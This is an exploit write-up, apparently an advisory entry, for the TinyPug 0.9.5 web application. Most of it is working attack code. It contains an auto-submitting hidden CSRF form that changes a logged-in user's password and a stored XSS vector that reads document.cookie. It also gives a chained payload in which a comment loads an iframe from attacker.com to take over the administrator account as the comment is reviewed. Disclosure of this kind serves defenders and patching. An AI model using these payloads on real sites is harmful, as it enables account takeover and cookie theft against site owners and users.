+--> Exploiting The CSRF Vulnerability:
    As any CSRF attack, you need victim to be logged in at target site, namely "victim.com",
    and visits the attacker's site, namely "attacker.com".
    Then attacker can change password of the victim (for example to "the-new-password")
    by presenting following code at attacker.com site:
    <div>
        <iframe id="if1" name="if1" style="display:none">
            This frame is invisible!!
        </iframe>
        <form action="http://victim.com/tinypug-0.9.5/profiles/change_password"
                method="post" id="the_form" style="display:none" target="if1">    
            <input type="password" name="password" value="the-new-password"  />
            <input type="password" name="password2" value="the-new-password"  />
            <input type="submit" value="Change Password"  />
        </form>
        <script type="text/javascript">
        //<![CDATA[
            var $form = document.getElementById ('the_form');
            $form.submit ();
        //]]>
        </script>
    </div>

+--> Exploiting The Stored XSS Vulnerability:
    Simply go to the comment page of a post
    (for example at "http://victim.com/tinypug-0.9.5/stories/view/welcome#comments")
    and embed any desired XSS vector like <script>alert(document.cookie)</script>
    But be aware that comments will be reviewed by administrators before publishing.

+--> Changing Administrator Password by combining above Vulnerabilities:
    Using the Stored XSS attack, make administrator to see following code:
    
    My comment !!! <iframe id="f2" name="f2" src="http://attacker.com/csrf.php" style="display:none" />
    
    Then whether he/she approve your comment or not :) his/her password will be changed
    to "the-new-password" via CSRF attack by visiting implicitly
    the "http://attacker.com/csrf.php" URI.